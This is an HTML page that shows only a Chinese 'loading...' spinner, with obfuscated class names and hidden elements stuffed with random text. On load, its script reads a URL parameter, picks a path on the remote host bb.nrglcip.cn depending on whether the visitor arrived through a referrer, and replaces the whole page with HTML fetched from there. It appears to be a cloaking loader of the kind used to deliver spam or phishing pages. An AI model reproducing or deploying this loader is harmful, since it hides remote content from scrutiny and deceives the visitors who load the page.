<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TLtt02 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TLtt02 .I3lQYvnQi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TLtt02 .content {
            line-height: 50px;
            text-align: center
        }

        .TLtt02 .img {
            width: 100%
        }

        .TLtt02 .cgZvL5zo7o {
            text-align: center
        }

        .TLtt02 .cgZvL5zo7o span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TLtt02 .cgZvL5zo7o span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TLtt02 .cgZvL5zo7o span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TLtt02 .cgZvL5zo7o span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TLtt02 .cgZvL5zo7o span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TLtt02 .cgZvL5zo7o span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TLtt02 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rweR66KXlTa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QTcNPS = rweR66KXlTa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QTcNPS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QTcNPS +".html?a=share";
		}
		
        L846I27=url+"#"+new Date().getTime();
        L846I27 && function() {
            $.get(L846I27, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >gLxfdy7TCmc3IbiipAzkudycxpksDf5MLEH3iVXmQFffTXVKTxiAQs5WYWzWH1RhYcqJYOcYY78t</li>
<div style='display:none'>rXYEB7g4f7fRwQ48E4EzEoTcHn7QShqDgkH6yBHw0Hk3Cj4TYCjse8KHZuyeVtOqQV5IU3J</div>
<div style='display:none'>rXYEB7g4f7fRwQ48E4EzEoTcHn7QShqDgkH6yBHw0Hk3Cj4TYCjse8KHZuyeVtOqQV5IU3J</div>
<div style='display:none'>rXYEB7g4f7fRwQ48E4EzEoTcHn7QShqDgkH6yBHw0Hk3Cj4TYCjse8KHZuyeVtOqQV5IU3J</div>
<div style='display:none'>rXYEB7g4f7fRwQ48E4EzEoTcHn7QShqDgkH6yBHw0Hk3Cj4TYCjse8KHZuyeVtOqQV5IU3J</div>
<a  href='#' style='display:none'>CAtRwCeajguIuLI8K1ikbiU3hVCw0GhSbYwSB24YE185pwn31BeV1ojsGPRqeHb9Wv9umIGhkWiOerOdCpHXfBIfks5G5AS4N</a><div class="TLtt02">
    <div class="I3lQYvnQi">
        <div class="cgZvL5zo7o">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >uYjeWa6R3RFn1j27RRP6mlcW4BjGtH8suahq88UZ5ajx1D1oJuo9MYFp0fTqk9GL42d9bGRZ</b>
<b style='display:none' >uYjeWa6R3RFn1j27RRP6mlcW4BjGtH8suahq88UZ5ajx1D1oJuo9MYFp0fTqk9GL42d9bGRZ</b>
<b style='display:none' >uYjeWa6R3RFn1j27RRP6mlcW4BjGtH8suahq88UZ5ajx1D1oJuo9MYFp0fTqk9GL42d9bGRZ</b>
<ul style='display:none' >MduDSsrjVAqwbJkxnA7rwdwtTBZqb7zUFQ9S40vj</ul>
<li style='display:none' >SXKCYWmpJWV1jYhTlsiS5ypbPVY0OgZ2kJpnc02nMyq</li></body>
</html>